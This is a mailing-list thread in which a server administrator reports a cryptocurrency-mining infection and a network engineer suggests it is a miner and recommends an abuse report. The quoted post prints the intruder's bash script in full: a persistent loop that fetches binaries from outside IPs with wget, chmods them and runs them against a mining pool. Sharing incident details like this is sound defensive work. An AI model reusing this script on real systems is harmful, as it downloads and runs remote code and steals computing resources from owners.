All, This looks like its some form of crypto currency miner "xptMiner.exe", think that ones a RieCoin one...
Undoubtedly the servers in use are compromised in some way but may be worth an abuse message to the contact on the RIR record in whois? Gavin, have sent you an e-mail off topic as well with a little more info, hope it was useful. --- Gary Steers Chief Network Engineer | Boosty On 20 April 2014 19:56, Gavin Henry <[email protected]> wrote: > Hi all, > > Not usually a post you see on uknof, but wanted some help and to check > if anyone else has seen this? > > We've just started getting alerts from one of our servers for highload > and discovered a weird process: > > nagios 285936 0.0 0.0 10744 1468 ? S 19:03 0:00 > bash /tmp/toplel > nagios 292199 102 0.5 3261868 362816 ? Rl 19:39 0:15 \_ > /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 -s > 2965706752 > > > root@hostname:/tmp# ls -lh > total 1016K > -rw-r--r-- 1 nagios nagios 0 Apr 20 18:26 lllll > -rwxrwxrwx 1 nagios nagios 615 Apr 20 19:05 toplel > -rwxrwxrwx 1 nagios nagios 1008K Apr 19 21:59 w00t > > > No idea where it came from. All our stuff has OpenSSL updated as is > our Nagios. w00t is a binary, toplel is a bash script containing: > > #!/bin/bash > if [ $1 -le 10 ] ; then > NUM = $(expr $1 + 1) > nohup bash $0 $NUM >/dev/null 2>&1 & > exit > fi > CORECOUNT=$(cat /proc/cpuinfo | grep -c processor) > FREE=$(free -b | head -n2 | tail -n1 | awk '{print $4}') > FREE=$(expr $FREE - 52428800) > FREE=$(expr $FREE / $CORECOUNT) > > while true; do > killall w00t > wget http://162.213.24.40/nope-sse4 -O /tmp/w00t > chmod 777 /tmp/w00t > /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 > -s $FREE > > wget http://162.213.24.40/nope-nse4 -O /tmp/w00t > chmod 777 /tmp/w00t > /tmp/w00t -d 0 -o http://128.65.210.244:8080 -u Seegee.lin -p 1 > -s $FREE > > sleep 300 > done; > > > > -- > Kind Regards, > Gavin Henry. > >
